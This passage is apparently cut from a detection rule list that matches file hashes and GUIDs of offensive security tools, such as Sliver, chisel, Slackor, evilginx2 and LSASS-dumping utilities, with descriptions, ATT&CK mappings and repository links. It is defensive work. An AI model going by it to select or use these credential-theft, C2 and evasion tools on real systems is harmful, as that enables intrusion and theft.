T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735*",".{0,1000}e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62*",".{0,1000}e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2*",".{0,1000}e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c*",".{0,1000}e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5*",".{0,1000}e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","file_hash","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43*",".{0,1000}e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e*",".{0,1000}e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf*",".{0,1000}e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70*",".{0,1000}e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E731C71B-4D1B-4BE7-AA4D-EDA52AF7F256*",".{0,1000}E731C71B\-4D1B\-4BE7\-AA4D\-EDA52AF7F256.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a*",".{0,1000}e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f*",".{0,1000}e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d*",".{0,1000}e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e*",".{0,1000}e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5*",".{0,1000}e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172*",".{0,1000}e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E7F99164-F00F-4B2A-86A9-8EB5F659F34C*",".{0,1000}E7F99164\-F00F\-4B2A\-86A9\-8EB5F659F34C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c*",".{0,1000}e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762*",".{0,1000}e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*E82BCAD1-0D2B-4E95-B382-933CF78A8128*",".{0,1000}E82BCAD1\-0D2B\-4E95\-B382\-933CF78A8128.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*E832E9B8-2158-4FC0-89A1-56C6ECC10F6B*",".{0,1000}E832E9B8\-2158\-4FC0\-89A1\-56C6ECC10F6B.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b*",".{0,1000}e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136*",".{0,1000}e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd*",".{0,1000}e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104*",".{0,1000}e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef*",".{0,1000}e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56*",".{0,1000}e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692*",".{0,1000}e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc*",".{0,1000}e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673*",".{0,1000}e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1*",".{0,1000}e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd*",".{0,1000}e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6*",".{0,1000}e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d*",".{0,1000}e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*",".{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2*",".{0,1000}e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6*",".{0,1000}e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*E991E6A7-31EA-42E3-A471-90F0090E3AFD*",".{0,1000}E991E6A7\-31EA\-42E3\-A471\-90F0090E3AFD.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6*",".{0,1000}e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E9D90B2A-F563-4A5E-9EFB-B1D6B1E7F8CB*",".{0,1000}E9D90B2A\-F563\-4A5E\-9EFB\-B1D6B1E7F8CB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d*",".{0,1000}e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb*",".{0,1000}ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2*",".{0,1000}ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 